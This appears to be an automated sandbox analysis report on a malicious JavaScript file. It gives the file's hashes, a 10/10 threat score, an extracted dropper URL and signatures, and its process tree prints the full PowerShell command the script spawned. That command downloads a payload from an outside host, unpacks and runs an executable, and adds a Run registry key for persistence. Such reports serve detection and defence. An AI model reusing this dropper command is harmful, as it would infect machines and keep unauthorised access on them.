Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    29-08-2023 08:27

General

  • Target

    458045804580.js

  • Size

    3KB

  • MD5

    171a355d5785a185ea3b4e0ed492ab8f

  • SHA1

    35074dcfb9ea1f95f1f5a5b0f55f9a15bec0b8cd

  • SHA256

    b7a8c276f3c573a244ec940d6a15bb9b95137066596b4e82e812b75334771b95

  • SHA512

    b0313df3a48eb9ba363feabd9cfd9f42f64496a4aac037558663eba1c1297e7cd2cf1d752687fed0944699ba7e28fcb04546edbe774eb8e5c0ab5b76e8004ade

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://instalfrio.cl/destination.txt

exe.dropper

http://instalfrio.cl/destination.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\458045804580.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2332

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2332-4-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

    Filesize

    2.9MB

  • memory/2332-5-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

    Filesize

    32KB

  • memory/2332-6-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB

  • memory/2332-9-0x00000000029D0000-0x0000000002A50000-memory.dmp

    Filesize

    512KB

  • memory/2332-8-0x00000000029D0000-0x0000000002A50000-memory.dmp

    Filesize

    512KB

  • memory/2332-10-0x00000000029D0000-0x0000000002A50000-memory.dmp

    Filesize

    512KB

  • memory/2332-7-0x00000000029D0000-0x0000000002A50000-memory.dmp

    Filesize

    512KB

  • memory/2332-11-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB

  • memory/2332-13-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp

    Filesize

    9.6MB